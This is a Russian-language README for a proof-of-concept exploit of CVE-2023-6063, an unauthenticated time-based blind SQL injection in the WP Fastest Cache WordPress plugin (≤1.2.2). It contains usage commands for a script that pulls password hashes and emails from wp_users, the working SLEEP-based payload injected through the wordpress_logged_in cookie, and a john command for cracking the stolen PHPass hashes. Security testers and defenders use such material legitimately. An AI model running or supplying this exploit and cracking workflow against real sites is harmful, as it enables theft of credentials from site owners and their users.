
Доказательство концепции для CVE-2023-6063, уязвимость временной слепой SQL-инъекции в WP Fastest Cache ≤1.2.2.
Proof of Concept для CVE-2023-6063, уязвимости слепой SQL-инъекции на основе времени в WP Fastest Cache ≤1.2.2. Извлекает хэшированные пароли (user_pass) и email-адреса (user_email) из таблицы wp_users, злоупотребляя cookie wordpress_logged_in.
Этот скрипт извлекает:
Установите зависимости (если не установлены):
pip install -r requirements.txt
Базовое использование:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Полный список опций:
-h, --help показать это справочное сообщение и выйти
-u URL, --url URL Полный URL WordPress для тестирования CVE-2023-6063
--username USERNAME Определить пользователя для извлечения его хэшированного пароля
-d DELAY, --delay DELAY
Время ожидания ответа веб-сервера, по умолчанию 5, минимум 2
-H HASH, --hash HASH Хэш для проверки в таблице wp_users, если хэш содержит специальные символы, используйте одинарные кавычки -> '<hash>'
--domain DOMAIN Имя домена для проверки email
-c COOKIE, --cookie COOKIE
Укажите имя cookie, если оно отличается в вашем контексте
--status-code STATUS_CODE
Использовать конкретный положительный статус-код, по умолчанию 200
--debug Более подробный вывод
--just-hash Извлекать только хэшированный пароль
--just-email Извлекать только email для пользователя
Это демонстрация для пользователя admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Когда хэши паролей утекают, используйте john или hashcat для их расшифровки с помощью алгоритма PHPass, если пароль уязвим.
Пример с John:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
Плагин WP Fastest Cache (≤1.2.2) для WordPress уязвим к неаутентифицированной слепой SQL-инъекции через cookie wordpress_logged_in. Злоумышленники могут использовать этот недостаток для извлечения конфиденциальных данных (например, хэшей паролей, email-адресов) из таблицы wp_users, используя задержки на основе времени (SLEEP()) в SQL-запросах.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Отказ от ответственности: Используйте эту информацию только для этичного тестирования безопасности с соответствующим разрешением. Несанкционированная эксплуатация незаконна.